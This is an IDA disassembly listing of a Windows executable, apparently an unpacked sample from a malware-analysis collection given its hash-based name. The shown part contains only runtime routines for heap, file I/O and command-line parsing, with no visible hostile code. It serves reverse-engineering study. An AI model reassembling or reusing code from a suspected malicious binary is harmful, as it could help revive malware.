;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 18557D626ED65109448B93C823CFE86A
; File Name : u:\work\18557d626ed65109448b93c823cfe86a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000387C ( 14460.)
; Section size in file : 0000387C ( 14460.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_401000 dd offset dword_401004 ; DATA XREF: CODE:0040314C�o
; CODE:00403154�o
dword_401004 dd 7453060Ah, 676E6972h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40100C proc near ; CODE XREF: sub_402914+9�p
jmp ds:dword_407104
sub_40100C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401014 proc near ; CODE XREF: sub_4010F4+D�p
jmp ds:dword_407100
sub_401014 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40101C proc near ; CODE XREF: sub_40112C+11�p
jmp ds:dword_4070FC
sub_40101C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401024 proc near ; CODE XREF: sub_401108+13�p
jmp ds:dword_4070F8
sub_401024 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40102C proc near ; CODE XREF: sub_401CDC+7C�p
jmp ds:dword_4070F4
sub_40102C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401034 proc near ; CODE XREF: sub_4013B0+24�p
jmp ds:dword_4070F0
sub_401034 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40103C proc near ; CODE XREF: sub_4029E8+C�p
jmp ds:dword_4070EC
sub_40103C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401044 proc near ; CODE XREF: sub_402944+3�p
jmp ds:dword_4070E8
sub_401044 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40104C proc near ; CODE XREF: sub_40299C+25�p
; sub_40299C+36�p
jmp ds:dword_4070E4
sub_40104C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401054 proc near ; CODE XREF: sub_402958+3D�p
jmp ds:dword_4070E0
sub_401054 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40105C proc near ; CODE XREF: sub_4013B0:loc_4013E6�p
jmp ds:dword_4070DC
sub_40105C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401064 proc near ; CODE XREF: sub_4014C8+4�p
; CODE:00401684�p
jmp ds:dword_4070D8
sub_401064 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40106C proc near ; CODE XREF: CODE:00401580�p
; sub_40190C+9B�p
jmp ds:dword_4070D4
sub_40106C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401074 proc near ; CODE XREF: CODE:00401669�p
jmp ds:dword_4070D0
sub_401074 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40107C proc near ; CODE XREF: sub_401410+A�p
jmp ds:dword_4070CC
sub_40107C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401084 proc near ; CODE XREF: CODE:004015A4�p
; sub_40185C+1C�p
jmp ds:dword_4070C8
sub_401084 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40108C proc near ; CODE XREF: CODE:loc_401653�p
; sub_40190C:loc_4019C7�p
jmp ds:dword_4070C4
sub_40108C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401094 proc near ; CODE XREF: sub_401B6C+1C�p
; DATA XREF: sub_401C70�o ...
jmp ds:dword_4070C0
sub_401094 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40109C proc near ; CODE XREF: sub_40144C+1E�p
; CODE:004015E1�p
jmp ds:dword_4070BC
sub_40109C endp
; ---------------------------------------------------------------------------
align 4
loc_4010A4: ; DATA XREF: sub_401C70+A�o
; BSS:off_40600C�o
jmp ds:dword_4070B8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AC proc near ; CODE XREF: CODE:00401618�p
jmp ds:dword_4070B4
sub_4010AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B4 proc near ; CODE XREF: CODE:004015C0�p
; CODE:0040160A�p
jmp ds:dword_4070B0
sub_4010B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010BC proc near ; CODE XREF: sub_40148C+1F�p
jmp ds:dword_4070AC
sub_4010BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C4 proc near ; CODE XREF: sub_4012C4+B�p
; sub_4012C4+37�p ...
jmp ds:dword_40710C
sub_4010C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010CC proc near ; CODE XREF: sub_401CDC+B2�p
jmp ds:dword_4070A8
sub_4010CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D4 proc near ; CODE XREF: sub_401258�p
; sub_40144C+27�p ...
jmp ds:dword_4070A4
sub_4010D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: sub_402208+16�p
jmp ds:dword_407118
sub_4010DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E4 proc near ; CODE XREF: sub_402208-A�p
jmp ds:dword_407114
sub_4010E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010EC proc near ; CODE XREF: sub_402914+22�p
jmp ds:dword_4070A0
sub_4010EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4010F4 proc near ; CODE XREF: sub_401144+4�p
; sub_401174+3F�p
; DATA XREF: ...
push eax
mov eax, ds:dword_40503C
push eax
mov eax, ds:dword_4063C0
push eax
call sub_401014 ; RtlAllocateHeap
retn
sub_4010F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401108 proc near ; CODE XREF: sub_40115C+4�p
; sub_401174+26�p
; DATA XREF: ...
push ebx
mov ebx, eax
push ebx
mov eax, ds:dword_40503C
and eax, 1
push eax
mov eax, ds:dword_4063C0
push eax
call sub_401024 ; RtlFreeHeap
cmp eax, 1
sbb eax, eax
neg eax
and eax, 7Fh
pop ebx
retn
sub_401108 endp
; =============== S U B R O U T I N E =======================================
sub_40112C proc near ; CODE XREF: sub_401174+D�p
; DATA XREF: DATA:off_405048�o
push edx
push eax
mov eax, ds:dword_40503C
and eax, 0
push eax
mov eax, ds:dword_4063C0
push eax
call sub_40101C ; RtlReAllocateHeap
retn
sub_40112C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401144 proc near ; CODE XREF: sub_401E84+C�p
; sub_40265C+CA�p ...
test eax, eax
jz short locret_401152
call ds:off_405040
or eax, eax
jz short loc_401153
locret_401152: ; CODE XREF: sub_401144+2�j
retn
; ---------------------------------------------------------------------------
loc_401153: ; CODE XREF: sub_401144+C�j
mov al, 1
jmp sub_40121C
sub_401144 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40115C proc near ; CODE XREF: sub_401DC4+1B�p
; sub_401DE8+20�p ...
test eax, eax
jz short locret_40116A
call ds:off_405044
or eax, eax
jnz short loc_40116B
locret_40116A: ; CODE XREF: sub_40115C+2�j
retn
; ---------------------------------------------------------------------------
loc_40116B: ; CODE XREF: sub_40115C+C�j
mov al, 2
jmp sub_40121C
sub_40115C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401174 proc near ; CODE XREF: sub_402184+22�p
; sub_40265C+BB�p
mov ecx, [eax]
test ecx, ecx
jz short loc_4011AC
test edx, edx
jz short loc_401196
push eax
mov eax, ecx
call ds:off_405048
pop ecx
or eax, eax
jz short loc_4011A5
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40118F: ; CODE XREF: sub_401174+2E�j
mov al, 2
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_401196: ; CODE XREF: sub_401174+8�j
mov [eax], edx
mov eax, ecx
call ds:off_405044
or eax, eax
jnz short loc_40118F
retn
; ---------------------------------------------------------------------------
loc_4011A5: ; CODE XREF: sub_401174+16�j
; sub_401174+48�j
mov al, 1
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4011AC: ; CODE XREF: sub_401174+4�j
test edx, edx
jz short locret_4011C0
push eax
mov eax, edx
call ds:off_405040
pop ecx
or eax, eax
jz short loc_4011A5
mov [ecx], eax
locret_4011C0: ; CODE XREF: sub_401174+3A�j
retn
sub_401174 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4011C4 proc near ; CODE XREF: sub_4011D0+42�p
mov ds:dword_405004, edx
call sub_401DAC
sub_4011C4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4011D0 proc near ; CODE XREF: sub_40121C+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_406004, 0
jz short loc_4011EC
mov edx, esi
mov eax, ebx
call ds:dword_406004
loc_4011EC: ; CODE XREF: sub_4011D0+10�j
test bl, bl
jnz short loc_4011FD
call sub_40299C
mov ebx, [eax+0]
jmp short loc_40120C
; ---------------------------------------------------------------------------
loc_4011FD: ; CODE XREF: sub_4011D0+1E�j
cmp bl, 18h
ja short loc_40120C
xor eax, eax
mov al, bl
mov bl, ds:byte_40504C[eax]
loc_40120C: ; CODE XREF: sub_4011D0+2B�j
; sub_4011D0+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_4011C4
sub_4011D0 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40121C proc near ; CODE XREF: sub_401144+11�j
; sub_40115C+11�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_4011D0
sub_40121C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401228 proc near ; CODE XREF: sub_402CDC+59�p
; sub_402CDC+69�p ...
push eax
push edx
push ecx
call sub_40299C
cmp dword ptr [eax+0], 0
pop ecx
pop edx
pop eax
jnz short loc_40123D
retn
; ---------------------------------------------------------------------------
loc_40123D: ; CODE XREF: sub_401228+12�j
xor eax, eax
jmp sub_40121C
sub_401228 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401248 proc near ; CODE XREF: sub_401258+5�p
; sub_40171C+36�p ...
push ebx
mov ebx, eax
call sub_40299C
mov [eax+0], ebx
pop ebx
retn
sub_401248 endp
; =============== S U B R O U T I N E =======================================
sub_401258 proc near ; CODE XREF: sub_40185C+28�p
; sub_4018E4+17�p
call sub_4010D4 ; RtlGetLastWin32Error
call sub_401248
retn
sub_401258 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401264 proc near ; CODE XREF: sub_4016A4+4F�p
; sub_401840+14�p ...
cmp ecx, 4
jge short loc_401285
jcxz locret_4012C3
cmp eax, edx
jz short locret_4012C3
push esi
push edi
mov esi, eax
mov edi, edx
ja short loc_401281
lea esi, [ecx+esi-1]
lea edi, [ecx+edi-1]
std
loc_401281: ; CODE XREF: sub_401264+12�j
rep movsb
jmp short loc_4012B1
; ---------------------------------------------------------------------------
loc_401285: ; CODE XREF: sub_401264+3�j
cmp eax, edx
jz short locret_4012C3
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
ja short loc_4012B3
and ecx, 3
lea esi, [eax+esi-1]
lea edi, [eax+edi-1]
std
rep movsb
sar eax, 2
mov ecx, eax
mov eax, 3
sub esi, eax
sub edi, eax
rep movsd
loc_4012B1: ; CODE XREF: sub_401264+1F�j
cld
dec ecx
loc_4012B3: ; CODE XREF: sub_401264+2D�j
sar ecx, 2
js short loc_4012C1
rep movsd
and eax, 3
mov ecx, eax
rep movsb
loc_4012C1: ; CODE XREF: sub_401264+52�j
pop edi
pop esi
locret_4012C3: ; CODE XREF: sub_401264+5�j
; sub_401264+A�j ...
retn
sub_401264 endp
; =============== S U B R O U T I N E =======================================
sub_4012C4 proc near ; CODE XREF: sub_4013B0+41�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_4012D6
; ---------------------------------------------------------------------------
loc_4012CE: ; CODE XREF: sub_4012C4+1A�j
push ebx
call sub_4010C4 ; CharNextA
mov ebx, eax
loc_4012D6: ; CODE XREF: sub_4012C4+8�j
; sub_4012C4+2A�j
mov al, [ebx]
test al, al
jz short loc_4012E0
cmp al, 20h
jbe short loc_4012CE
loc_4012E0: ; CODE XREF: sub_4012C4+16�j
cmp byte ptr [ebx], 22h
jnz short loc_4012F0
cmp byte ptr [ebx+1], 22h
jnz short loc_4012F0
add ebx, 2
jmp short loc_4012D6
; ---------------------------------------------------------------------------
loc_4012F0: ; CODE XREF: sub_4012C4+1F�j
; sub_4012C4+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_401339
; ---------------------------------------------------------------------------
loc_4012F6: ; CODE XREF: sub_4012C4+79�j
cmp al, 22h
jnz short loc_40132B
push ebx
call sub_4010C4 ; CharNextA
mov ebx, eax
jmp short loc_401312
; ---------------------------------------------------------------------------
loc_401304: ; CODE XREF: sub_4012C4+56�j
push ebx
call sub_4010C4 ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401312: ; CODE XREF: sub_4012C4+3E�j
mov al, [ebx]
test al, al
jz short loc_40131C
cmp al, 22h
jnz short loc_401304
loc_40131C: ; CODE XREF: sub_4012C4+52�j
cmp byte ptr [ebx], 0
jz short loc_401339
push ebx
call sub_4010C4 ; CharNextA
mov ebx, eax
jmp short loc_401339
; ---------------------------------------------------------------------------
loc_40132B: ; CODE XREF: sub_4012C4+34�j
push ebx
call sub_4010C4 ; CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401339: ; CODE XREF: sub_4012C4+30�j
; sub_4012C4+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_4012F6
mov eax, esi
mov edx, ebp
call sub_402184
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_4013A1
; ---------------------------------------------------------------------------
loc_401350: ; CODE XREF: sub_4012C4+E1�j
cmp al, 22h
jnz short loc_40138C
push ebx
call sub_4010C4 ; CharNextA
mov ebx, eax
jmp short loc_401373
; ---------------------------------------------------------------------------
loc_40135E: ; CODE XREF: sub_4012C4+B7�j
push ebx
call sub_4010C4 ; CharNextA
cmp eax, ebx
jbe short loc_401373
loc_401368: ; CODE XREF: sub_4012C4+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_401368
loc_401373: ; CODE XREF: sub_4012C4+98�j
; sub_4012C4+A2�j
mov al, [ebx]
test al, al
jz short loc_40137D
cmp al, 22h
jnz short loc_40135E
loc_40137D: ; CODE XREF: sub_4012C4+B3�j
cmp byte ptr [ebx], 0
jz short loc_4013A1
push ebx
call sub_4010C4 ; CharNextA
mov ebx, eax
jmp short loc_4013A1
; ---------------------------------------------------------------------------
loc_40138C: ; CODE XREF: sub_4012C4+8E�j
push ebx
call sub_4010C4 ; CharNextA
cmp eax, ebx
jbe short loc_4013A1
loc_401396: ; CODE XREF: sub_4012C4+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_401396
loc_4013A1: ; CODE XREF: sub_4012C4+8A�j
; sub_4012C4+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_401350
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4013B0 proc near ; CODE XREF: CODE:00404096�p
; CODE:004041CB�p ...
var_114 = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_401DC4
test esi, esi
jnz short loc_4013E6
push 105h
lea eax, [esp+118h+var_114]
push eax
push 0
call sub_401034 ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_401EB0
jmp short loc_401404
; ---------------------------------------------------------------------------
loc_4013E6: ; CODE XREF: sub_4013B0+16�j
call sub_40105C ; GetCommandLineA
mov edi, eax
loc_4013ED: ; CODE XREF: sub_4013B0+52�j
mov edx, ebx
mov eax, edi
call sub_4012C4
mov edi, eax
test esi, esi
jz short loc_401404
cmp dword ptr [ebx], 0
jz short loc_401404
dec esi
jmp short loc_4013ED
; ---------------------------------------------------------------------------
loc_401404: ; CODE XREF: sub_4013B0+34�j
; sub_4013B0+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_4013B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401410 proc near ; CODE XREF: CODE:004041EA�p
var_18 = byte ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
lea eax, [ebp+var_18]
push eax
call sub_40107C ; GetSystemTime
movzx eax, [ebp+var_10]
imul eax, 3Ch
add ax, [ebp+var_E]
imul eax, 3Ch
xor edx, edx
mov dx, [ebp+var_C]
add eax, edx
imul eax, 3E8h
mov dx, [ebp+var_A]
add eax, edx
mov ds:dword_405008, eax
mov esp, ebp
pop ebp
retn
sub_401410 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40144C proc near ; DATA XREF: CODE:00401528�o
push ebx
mov ebx, eax
xor eax, eax
mov [ebx+10h], eax
xor eax, eax
mov [ebx+0Ch], eax
push 0
lea eax, [ebx+10h]
push eax
mov eax, [ebx+8]
push eax
mov eax, [ebx+14h]
push eax
mov eax, [ebx]
push eax
call sub_40109C ; ReadFile
test eax, eax
jnz short loc_401481
call sub_4010D4 ; RtlGetLastWin32Error
cmp eax, 6Dh
jnz short loc_401483
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401481: ; CODE XREF: sub_40144C+25�j
xor eax, eax
loc_401483: ; CODE XREF: sub_40144C+2F�j
pop ebx
retn
sub_40144C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401488 proc near ; DATA XREF: CODE:0040155F�o
; CODE:0040162F�o ...
xor eax, eax
retn
sub_401488 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40148C proc near ; DATA XREF: CODE:loc_401551�o
; CODE:00401677�o
var_C = byte ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
mov esi, [ebx+0Ch]
test esi, esi
jnz short loc_40149C
xor eax, eax
jmp short loc_4014C2
; ---------------------------------------------------------------------------
loc_40149C: ; CODE XREF: sub_40148C+A�j
push 0
lea eax, [esp+10h+var_C]
push eax
push esi
mov eax, [ebx+14h]
push eax
mov eax, [ebx]
push eax
call sub_4010BC ; WriteFile
test eax, eax
jnz short loc_4014BB
call sub_4010D4 ; RtlGetLastWin32Error
jmp short loc_4014BD
; ---------------------------------------------------------------------------
loc_4014BB: ; CODE XREF: sub_40148C+26�j
xor eax, eax
loc_4014BD: ; CODE XREF: sub_40148C+2D�j
xor edx, edx
mov [ebx+0Ch], edx
loc_4014C2: ; CODE XREF: sub_40148C+E�j
pop edx
pop esi
pop ebx
retn
sub_40148C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014C8 proc near ; CODE XREF: sub_4014D8+B�p
; sub_4018E4+E�p
push ebx
mov ebx, eax
push ebx
call sub_401064 ; CloseHandle
dec eax
setz al
pop ebx
retn
sub_4014C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014D8 proc near ; DATA XREF: CODE:loc_401558�o
push ebx
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
mov eax, [ebx]
call sub_4014C8
test al, al
jnz short loc_4014F3
call sub_4010D4 ; RtlGetLastWin32Error
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_4014D8+12�j
xor eax, eax
pop ebx
retn
sub_4014D8 endp
; ---------------------------------------------------------------------------
align 4
loc_4014F8: ; DATA XREF: sub_4016A4+35�o
push esi
mov esi, eax
xor eax, eax
mov [esi+0Ch], eax
mov [esi+10h], eax
mov ax, [esi+4]
sub eax, 0D7B1h
jz short loc_401519
dec eax
jz short loc_401531
dec eax
jz short loc_401542
jmp loc_401680
; ---------------------------------------------------------------------------
loc_401519: ; CODE XREF: CODE:0040150C�j
mov eax, 80000000h
mov edx, 1
mov ecx, 3
mov dword ptr [esi+1Ch], offset sub_40144C
jmp short loc_401558
; ---------------------------------------------------------------------------
loc_401531: ; CODE XREF: CODE:0040150F�j
mov eax, 40000000h
mov edx, 1
mov ecx, 2
jmp short loc_401551
; ---------------------------------------------------------------------------
loc_401542: ; CODE XREF: CODE:00401512�j
mov eax, 0C0000000h
mov edx, 1
mov ecx, 3
loc_401551: ; CODE XREF: CODE:00401540�j
mov dword ptr [esi+1Ch], offset sub_40148C
loc_401558: ; CODE XREF: CODE:0040152F�j
mov dword ptr [esi+24h], offset sub_4014D8
mov dword ptr [esi+20h], offset sub_401488
cmp byte ptr [esi+48h], 0
jz loc_401622
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [esi+48h]
push eax
call sub_40106C ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_401696
mov [esi], eax
cmp word ptr [esi+4], 0D7B3h
jnz loc_40165F
dec word ptr [esi+4]
push 0
push dword ptr [esi]
call sub_401084 ; GetFileSize
inc eax
jz loc_401696
sub eax, 81h
jnb short loc_4015B9
xor eax, eax
loc_4015B9: ; CODE XREF: CODE:004015B5�j
push 0
push 0
push eax
push dword ptr [esi]
call sub_4010B4 ; SetFilePointer
inc eax
jz loc_401696
push 0
mov edx, esp
push 0
push edx
push 80h
lea edx, [esi+14Ch]
push edx
push dword ptr [esi]
call sub_40109C ; ReadFile
pop edx
dec eax
jnz loc_401696
xor eax, eax
loc_4015F0: ; CODE XREF: CODE:004015FF�j
cmp eax, edx
jnb short loc_40165F
cmp byte ptr [esi+eax+14Ch], 0Eh
jz short loc_401601
inc eax
jmp short loc_4015F0
; ---------------------------------------------------------------------------
loc_401601: ; CODE XREF: CODE:004015FC�j
push 2
push 0
sub eax, edx
push eax
push dword ptr [esi]
call sub_4010B4 ; SetFilePointer
inc eax
jz loc_401696
push dword ptr [esi]
call sub_4010AC ; SetEndOfFile
dec eax
jnz short loc_401696
jmp short loc_40165F
; ---------------------------------------------------------------------------
loc_401622: ; CODE XREF: CODE:0040156A�j
lea eax, [esi+14Ch]
mov dword ptr [esi+8], 80h
mov dword ptr [esi+24h], offset sub_401488
mov [esi+14h], eax
cmp word ptr [esi+4], 0D7B2h
jz short loc_401645
push 0FFFFFFF6h
jmp short loc_401653
; ---------------------------------------------------------------------------
loc_401645: ; CODE XREF: CODE:0040163F�j
cmp esi, offset dword_4061F0
jnz short loc_401651
push 0FFFFFFF4h
jmp short loc_401653
; ---------------------------------------------------------------------------
loc_401651: ; CODE XREF: CODE:0040164B�j
push 0FFFFFFF5h
loc_401653: ; CODE XREF: CODE:00401643�j
; CODE:0040164F�j
call sub_40108C ; GetStdHandle
cmp eax, 0FFFFFFFFh
jz short loc_401696
mov [esi], eax
loc_40165F: ; CODE XREF: CODE:00401596�j
; CODE:004015F2�j ...
cmp word ptr [esi+4], 0D7B1h
jz short loc_40167E
push dword ptr [esi]
call sub_401074 ; GetFileType
test eax, eax
jz short loc_401682
cmp eax, 2
jnz short loc_40167E
mov dword ptr [esi+20h], offset sub_40148C
loc_40167E: ; CODE XREF: CODE:00401665�j
; CODE:00401675�j
xor eax, eax
loc_401680: ; CODE XREF: CODE:00401514�j
; CODE:00401694�j ...
pop esi
retn
; ---------------------------------------------------------------------------
loc_401682: ; CODE XREF: CODE:00401670�j
push dword ptr [esi]
call sub_401064 ; CloseHandle
mov word ptr [esi+4], 0D7B0h
mov eax, 69h
jmp short loc_401680
; ---------------------------------------------------------------------------
loc_401696: ; CODE XREF: CODE:00401588�j
; CODE:004015AA�j ...
mov word ptr [esi+4], 0D7B0h
call sub_4010D4 ; RtlGetLastWin32Error
jmp short loc_401680
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4016A4 proc near ; CODE XREF: sub_402CDC+44�p
; CODE:004042D5�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
xor ecx, ecx
mov edx, 14Ch
call sub_4018A8
lea eax, [ebx+14Ch]
mov [ebx+14h], eax
mov word ptr [ebx+4], 0D7B0h
xor eax, eax
mov al, ds:byte_405014
mov [ebx+6], ax
mov dword ptr [ebx+8], 80h
mov dword ptr [ebx+18h], offset loc_4014F8
mov eax, esi
call sub_401F04
push eax
mov eax, esi
call sub_402058
lea edx, [ebx+48h]
pop ecx
call sub_401264
mov eax, esi
call sub_401F04
mov byte ptr [ebx+eax+48h], 0
xor eax, eax
pop esi
pop ebx
retn
sub_4016A4 endp
; ---------------------------------------------------------------------------
align 4
loc_40170C: ; DATA XREF: sub_4017A8+D�o
jmp ds:dword_4070BC
; ---------------------------------------------------------------------------
align 4
loc_401714: ; DATA XREF: sub_4017C8+D�o
jmp ds:dword_4070AC
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40171C proc near ; CODE XREF: sub_4017A8+14�p
; sub_4017C8+14�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, ecx
mov edi, edx
mov ebx, eax
mov eax, [ebp+arg_8]
movzx edx, word ptr [ebx+4]
and edx, eax
cmp eax, edx
jnz short loc_40178E
push 0
lea eax, [ebp+var_4]
push eax
mov eax, [ebx+8]
imul esi
push eax
push edi
mov eax, [ebx]
push eax
call [ebp+arg_4]
test eax, eax
jnz short loc_40175E
call sub_4010D4 ; RtlGetLastWin32Error
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40175E: ; CODE XREF: sub_40171C+2F�j
mov eax, [ebp+var_4]
xor edx, edx
div dword ptr [ebx+8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
test eax, eax
jz short loc_40177A
mov eax, [ebp+arg_C]
mov edx, [ebp+var_4]
mov [eax], edx
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40177A: ; CODE XREF: sub_40171C+52�j
cmp esi, [ebp+var_4]
jz short loc_40179D
mov eax, [ebp+arg_0]
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40178E: ; CODE XREF: sub_40171C+18�j
mov eax, 67h
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
loc_40179D: ; CODE XREF: sub_40171C+40�j
; sub_40171C+5C�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 10h
sub_40171C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017A8 proc near ; CODE XREF: sub_402CDC+A0�p
; sub_402CDC+10E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push ebx
push 0D7B1h
push offset loc_40170C
push 64h
call sub_40171C
pop ebx
pop ebp
retn 4
